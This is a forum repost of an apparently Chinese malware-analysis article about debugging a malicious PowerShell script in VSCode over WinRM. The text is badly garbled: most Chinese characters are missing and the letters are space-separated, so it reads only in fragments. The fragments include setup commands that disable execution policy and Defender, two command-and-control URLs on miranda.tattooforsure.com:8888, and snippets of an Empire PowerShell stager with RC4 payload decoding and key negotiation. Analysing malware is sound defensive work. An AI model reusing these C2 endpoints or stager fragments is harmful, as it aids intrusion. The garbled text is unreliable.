搜索

[15998] 2020-10-22_使用VSCode远程调试恶意Powershell脚本

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-10-22_使用VSCode远程调试恶意Powershell脚本 使 V S C o d e P o w e r s h e l l   F r e e B u f   2 0 2 0 - 1 0 - 2 2 P o w e r s h e l l P o w e r s h e l l I S E I S E 使 使 V S C o d e P o w e r s h e l l P o w e r s h e l l 使 P o w e r s h e l l C & C p a y l o a d b a t b a s e 6 4 P o w e r s h e l l
使 W i n 1 0 V S C o d e W i n 1 0 w i n r m   q u i c k c o n f i g W i n d o w s   ( W i n R M )  
P o w e r s h e l l s e t - e x e c u t i o n p o l i c y   u n r e s t r i c t e d W i n d o w s   D e f e n d e r V S C o d e P o w e r s h e l l V S C o d e P o w e r s h e l l E n t e r - P S S e s s i o n   - C o m p u t e r N a m e   [ i p ]   - C r e d e n t i a l   [ ] p s e d i t   [ ]
F 5 便 h t t p : / / m i r a n d a . t a t t o o f o r s u r e . c o m : 8 8 8 8 / a d m i n / g e t . p h p V S C o d e $ p a y l o a d   =   - J O I n   [ C h A r [ ] ] ( &   $ R   $ D a t a   ( $ I V   +   $ K ) ) $ p a y l o a d 便 $ p a y l o a d
$ p a y l o a d p a y l o a d . p s 1 S t a r t - N E G O t i a t E $ s e r $ u $ h o p p a y l o a d . p s 1 I P O S P o w e r s h e l l 使 R C   4 R C   4
C & C h t t p : / / m i r a n d a . t a t t o o f o r s u r e . c o m : 8 8 8 8 / l o g i n / p r o c e s s . p h p C & C p a y l o a d p a y l o a d p a y l o a d 2 . p s 1 U 5 B S 3 p a y l o a d . p s 1
便 U 5 B S 3 p a y l o a d . p s 1 U 5 B S 3   - S e r v e r s   @ ( ( $ s   - s p l i t   / ) [ 0 . . 2 ] - j o i n   / )   - S t a g i n g K e y   $ S K   - S e s s i o n K e y   $ k e y   - S e s s i o n I D   $ I D   - W o r k i n g H o u r s   W O R K I N G _ H O U R S _ R E P L A C E   - K i l l D a t e   R E P L A C E _ K I L L D A T E   - P r o x y S e t t i n g s   $ S c r i p t : P r o x y U 5 B S 3 E m p i r e P o w e r s h e l l C & C
V S C o d e I D E P o w e r s h e l l V S C o d e P o w e r s h e l l

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理